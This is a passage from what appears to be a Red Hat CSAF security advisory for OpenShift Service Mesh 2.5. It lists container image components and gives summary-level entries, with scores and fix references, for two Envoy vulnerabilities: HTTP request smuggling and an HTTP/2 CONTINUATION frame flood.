full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, ], }, vulnerabilities: [ { cve: "CVE-2024-23326", cwe: { id: "CWE-444", name: "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", }, discovery_date: "2024-01-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2259228", }, ], notes: [ { category: "description", text: "A possible request smuggling vulnerability exists through Envoy. This issue occurs if a server can be tricked into adding an upgrade header into a response.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-23326", }, { category: "external", summary: "RHBZ#2259228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259228", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-23326", url: "https://www.cve.org/CVERecord?id=CVE-2024-23326", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-23326", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-23326", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.4, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode", }, { acknowledgments: [ { names: [ "Bartek Nowotarski", ], organization: "nowotarski.info", }, ], cve: "CVE-2024-30255", cwe: { id: "CWE-390", name: "Detection of Error Condition Without Action", }, discovery_date: "2024-04-02T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2272986", }, ], notes: [ { category: "description", text: "A vulnerability was found in how Envoy Proxy implements the HTTP/2 codec. There are insufficient limitations placed on the amount of CONTINUATION frames that can be sent within a single stream. This issue could allow an unauthenticated remote attacker to send packets to vulnerable servers, which could use up compute resources to cause a Denial of Service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood", title: "Vulnerability summary", }, { category: "other", text: "Red Hat rates the security impact of this vulnerability as Moderate, in alignment with upstream Envoy. The worst case scenario is excessive CPU utilization causing a denial of service. Once an attack has ended, the system should return to normal operations on its own.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", 